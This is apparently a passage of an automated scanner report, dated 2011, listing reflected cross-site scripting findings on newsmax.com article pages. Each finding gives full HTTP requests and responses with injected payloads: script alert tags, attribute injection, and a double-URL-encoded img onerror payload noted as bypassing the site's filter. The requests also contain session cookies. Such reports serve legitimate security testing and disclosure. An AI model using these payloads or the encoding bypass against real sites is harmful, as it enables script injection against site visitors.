<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1' class="article_tools_link"> ...[SNIP]...
1.16. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae9b"><script>alert(1)</script>e60bdf8e5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46591
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f36c'%20a%3db%209c59266b336 was submitted in the REST URL parameter 2. This input was echoed as 6f36c' a=b 9c59266b336 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c'%20a%3db%209c59266b336/2011/03/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c' a=b 9c59266b336/2011/03/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 625a6'%20a%3db%203c060553950 was submitted in the REST URL parameter 3. This input was echoed as 625a6' a=b 3c060553950 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6'%20a%3db%203c060553950/03/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6' a=b 3c060553950/03/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aca5'%20a%3db%2043ce35206ee was submitted in the REST URL parameter 4. This input was echoed as 7aca5' a=b 43ce35206ee in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5'%20a%3db%2043ce35206ee/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5' a=b 43ce35206ee/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650ed'%20a%3db%20c4f3c295575 was submitted in the REST URL parameter 5. This input was echoed as 650ed' a=b c4f3c295575 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed'%20a%3db%20c4f3c295575/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed' a=b c4f3c295575/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e was submitted in the REST URL parameter 7. This input was echoed as 93798"><img src=a onerror=alert(1)>4bf8f812a6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991293798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(38991293798"><img src=a onerror=alert(1)>4bf8f812a6e);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63b74'%20a%3db%202a564a64376 was submitted in the REST URL parameter 7. This input was echoed as 63b74' a=b 2a564a64376 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74'%20a%3db%202a564a64376 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41730 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74' a=b 2a564a64376' class="article_tools_link"> ...[SNIP]...
1.23. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91767"><script>alert(1)</script>440de3016dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45937 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... wdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1')" class="article_tools_link"> ...[SNIP]...
1.24. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cd1b'><script>alert(1)</script>051994016ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45932 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44a6d'%20a%3db%20ed277f82d16 was submitted in the REST URL parameter 2. This input was echoed as 44a6d' a=b ed277f82d16 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d'%20a%3db%20ed277f82d16/2011/03/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... smax.com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d' a=b ed277f82d16/2011/03/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49a3c'%20a%3db%203b54920ef53 was submitted in the REST URL parameter 3. This input was echoed as 49a3c' a=b 3b54920ef53 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c'%20a%3db%203b54920ef53/03/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c' a=b 3b54920ef53/03/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1c200'%20a%3db%20f3dc1d27183 was submitted in the REST URL parameter 4. This input was echoed as 1c200' a=b f3dc1d27183 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200'%20a%3db%20f3dc1d27183/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... /contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200' a=b f3dc1d27183/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f18c1'%20a%3db%20df36caabad1 was submitted in the REST URL parameter 5. This input was echoed as f18c1' a=b df36caabad1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1'%20a%3db%20df36caabad1/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... ntact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1' a=b df36caabad1/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 was submitted in the REST URL parameter 7. This input was echoed as 75ff3"><img src=a onerror=alert(1)>a2bddf3f416 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991775ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42570 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:29 GMT Connection: close
